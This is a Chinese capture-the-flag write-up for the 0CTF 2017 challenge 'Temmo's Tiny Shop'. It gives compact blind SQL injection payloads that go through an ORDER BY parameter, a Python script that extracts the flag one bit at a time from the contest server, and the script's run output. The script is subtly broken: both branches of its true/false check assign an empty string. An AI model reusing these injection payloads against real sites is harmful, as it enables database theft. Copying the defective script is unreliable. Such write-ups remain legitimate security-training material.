洒家参加了0CTF 2017,做了一些题目。赛后过了好几天,看网上已经有了一些写得不错的Writeup,这里就写一写洒家的一些不一样的思路。

一些不错的Writeup

Temmo’s Tiny Shop

洒家看网上的Writeup 在拿到Hint,知道flag的表名后爆破flag的每一字节,效率可能比较低。这里是洒家比赛的时候想到的按bit爆破的方法,对于ASCII,只考虑7bit,每字节固定需要7次请求即可得到。

需要购买Erwin Schrodinger's Cat和Brownie。

一开始的Payload是:

case(ascii(substr((select(flag)from(ce63e444b0d049e9c899c9a0336b3c59)),1,1))div(16)mod(2))when(1)then(name)else(price)end

由于长度限制(WAF,最长100字节),修改Payload:

if(ascii(substr((select(flag)from(ce63e444b0d049e9c899c9a0336b3c59)),1,1))div(16)mod(2),name,price)

由于长度还是太长,把Price改成3也可以排序。

if(ascii(substr((select(flag)from(ce63e444b0d049e9c899c9a0336b3c59)),1,1))div(16)mod(2),name,3)

注:此处的3并不是按第3列排序,即和order by 3 作用不同,而是和 order by '3' 作用相同,和不加order by 效果相同(不知道是MySQL什么特性)

由此,最终的脚本是:

import requests


# code from https://www.cnblogs.com/go2bed/p/6607565.html

s = requests.Session()

cookie = {'PHPSESSID':'YOURCOOKIE'} # add your cookie

url = 'http://202.120.7.197/app.php'

true_str = '"goods":[{"id":"5"'

false_str = '"goods":[{"id":"2"'

order_by_template = 'if(ascii(substr((select(flag)from(ce63e444b0d049e9c899c9a0336b3c59)),%d,1))div(%d)mod(2),name,3)'

flag = ''

for place_index in xrange(1, 1000):

    place_bin = ''

    for times in xrange(6,-1,-1):

        num = 2 ** times

        order_by = order_by_template % (place_index, num)

        params = {'action':'search','keyword':'','order':order_by}

        r = s.get(url, params=params, cookies=cookie)

        #print r.content

        if true_str in r.content:

            new_place_bin = ''

        else:

            new_place_bin = ''

        print new_place_bin,

        place_bin += new_place_bin

    place = chr(int(place_bin, 2))

    flag += place

    print flag

    if '}' in flag:

        break

print '\n***** get flag *****'

print flag

运行效果:

1 1 0 0 1 1 0 f

1 1 0 1 1 0 0 fl

1 1 0 0 0 0 1 fla

1 1 0 0 1 1 1 flag

1 1 1 1 0 1 1 flag{

1 1 1 0 0 1 0 flag{r

0 1 1 0 1 0 0 flag{r4

1 1 0 0 0 1 1 flag{r4c

1 1 0 0 1 0 1 flag{r4ce

1 0 1 1 1 1 1 flag{r4ce_

1 1 0 0 0 1 1 flag{r4ce_c

0 1 1 0 0 0 0 flag{r4ce_c0

1 1 0 1 1 1 0 flag{r4ce_c0n

1 1 0 0 1 0 0 flag{r4ce_c0nd

1 1 0 1 0 0 1 flag{r4ce_c0ndi

1 1 1 0 1 0 0 flag{r4ce_c0ndit

1 1 0 1 0 0 1 flag{r4ce_c0nditi

0 1 1 0 0 0 0 flag{r4ce_c0nditi0

1 1 0 1 1 1 0 flag{r4ce_c0nditi0n

1 0 1 1 1 1 1 flag{r4ce_c0nditi0n_

1 1 0 1 0 0 1 flag{r4ce_c0nditi0n_i

0 1 1 0 1 0 1 flag{r4ce_c0nditi0n_i5

1 0 1 1 1 1 1 flag{r4ce_c0nditi0n_i5_

1 1 0 0 1 0 1 flag{r4ce_c0nditi0n_i5_e

1 1 1 1 0 0 0 flag{r4ce_c0nditi0n_i5_ex

1 1 0 0 0 1 1 flag{r4ce_c0nditi0n_i5_exc

1 1 0 1 0 0 1 flag{r4ce_c0nditi0n_i5_exci

1 1 1 0 1 0 0 flag{r4ce_c0nditi0n_i5_excit

1 1 0 0 1 0 1 flag{r4ce_c0nditi0n_i5_excite

1 1 0 0 1 0 0 flag{r4ce_c0nditi0n_i5_excited

1 1 1 1 1 0 1 flag{r4ce_c0nditi0n_i5_excited}

***** get flag *****

flag{r4ce_c0nditi0n_i5_excited}

0CTF 2017 部分Web的某些不一样的思路的更多相关文章

  1. JAVA WEB 用servlet实现分页,思路比较清晰和简单。

    JAVA WEB 用servlet实现分页,思路比较清晰和简单.借鉴了其他大佬的思路.特别感谢. 是我第一次发表博客,如果有什么错误,欢迎大家指出!,谢谢 一.思路分析 前台一定是有类似这种的界面 点 ...

  2. 2017年Web前端开发工程师薪资越来越高?

    放眼全球,不仅在国内的互联网行业,在国外,前端工程师一样是需求旺盛.供不应求的香饽饽.所以在供不应求的前端招聘市场上,优秀的前端工程师才是有话语权的那一方. 前端开发是做什么的? 前端是互联网时代软件 ...

  3. Intellij Idea 2017创建web项目及tomcat部署实战

    相关软件:Intellij Idea2017.jdk16.tomcat7 Intellij Idea直接安装(可根据需要选择自己设置的安装目录),jdk使用1.6/1.7/1.8都可以,主要是配置好系 ...

  4. 【Intellij】Intellij Idea 2017创建web项目及tomcat部署实战

    相关软件:Intellij Idea2017.jdk16.tomcat7 Intellij Idea直接安装(可根据需要选择自己设置的安装目录),jdk使用1.6/1.7/1.8都可以,主要是配置好系 ...

  5. 6. Intellij Idea 2017创建web项目及tomcat部署实战

    转自:https://www.cnblogs.com/shindo/p/7272646.html 相关软件:Intellij Idea2017.jdk16.tomcat7 Intellij Idea直 ...

  6. 2017百度web前端实习生在线笔试题

    代码: import java.util.Scanner; public class Main { public static void main(String[] args) { Scanner s ...

  7. 0ctf 2017 kernel pwn knote write up

    UAF due to using hlist_add_behind() without checking. There is a pair locker(mutex_lock) at delete_n ...

  8. 对RESTful Web API的理解与设计思路

    距离上一篇关于Web API的文章(如何实现RESTful Web API的身份验证)有好些时间了,在那篇文章中提到的方法是非常简单而有效的,我在实际的项目中就这么用了,代码经过一段时间的磨合,已经很 ...

  9. 移动端Web适配的两种做法思路总结

    看了几篇文章,理一下网易跟淘宝移动端适配的思路,主要是参考 从网易与淘宝的font-size思考前端设计稿与工作流 像素相关概念 物理像素(physical pixel) 一个物理像素是显示器(手机屏 ...

随机推荐

  1. 在容器内执行go编译程序的坑

    如果你编译了一个go程序,让后把它放到容器里面.很多时候这个程序都会无法执行,大概的样子是: /tmp # ls pub sub /tmp # ./pub /bin/ash: pub: not fou ...

  2. 【原创】SM4password算法源代码接口具体解释

    [原创]SM4password算法源代码接口具体解释 近期几天想把cryptdb的加密算法换成国产的sm4加密算法.所以花了时间研究了一下sm4的源代码和基本原理,避免忘记,写下这篇博客以作记录. 先 ...

  3. select设置innerHMTL

    select控件在标准浏览器下可以直接innerHTML设置内容,IE则不行. HTML结构: <form name="form1"> <select name= ...

  4. 转:DDR中端接技术基本概念

    DDR中端接技术基本概念  版权声明:转载请注明出处:http://blog.csdn.net/lg2lh https://blog.csdn.net/lg2lh/article/details/90 ...

  5. VMware Workstation 永久许可证密钥

    VMware是功能最强大的虚拟机软件,用户可在虚拟机同时运行各种操作系统,进行开发.测试.演示和部署软件,虚拟机中复制服务器.台式机和平板环境,每个虚拟机可分配多个处理器核心.主内存和显存. VMwa ...

  6. Struts2学习八----------接收参数

    © 版权声明:本文为博主原创文章,转载请注明出处 接收参数 - 使用Action的属性接收参数 - 使用Domain Model接收参数 - 使用ModelDriven接收参数 实例 1.项目结构 2 ...

  7. cmake学习之- cmake_parse_arguments

    最后更新: 2019-06-08 一.指令介绍 cmake_parse_arguments 为解析函数(function)或 宏(macros) 参数的命令: cmake_parse_argument ...

  8. gulp入门-压缩js/css文件(windows)

    类似于grunt,都是基于Node.js的前端构建工具.不过gulp压缩效率更高. 工具/原料 nodejs/npm 方法/步骤 首先要确保pc上装有node,然后在global环境和项目文件中都in ...

  9. linux 经常使用命令

    帮助信息 ./configure -help|grep mysql 安装php ./configure --prefix=/usr/local/fastphp --with-mysql=mysqlnd ...

  10. 摩根大通银行被黑客攻克, ATM机/网银危在旦夕,winxp退市灾难来临了

    winxp4月退市到如今还不到半年,就出现故障了 7600多万个消费者银行账户被黑.此外还有700万个小企业账户的信息也被黑客窃取,这个算不算灾难呢?假设等到银行业彻底崩溃,资金彻底丧失,那不仅仅是灾 ...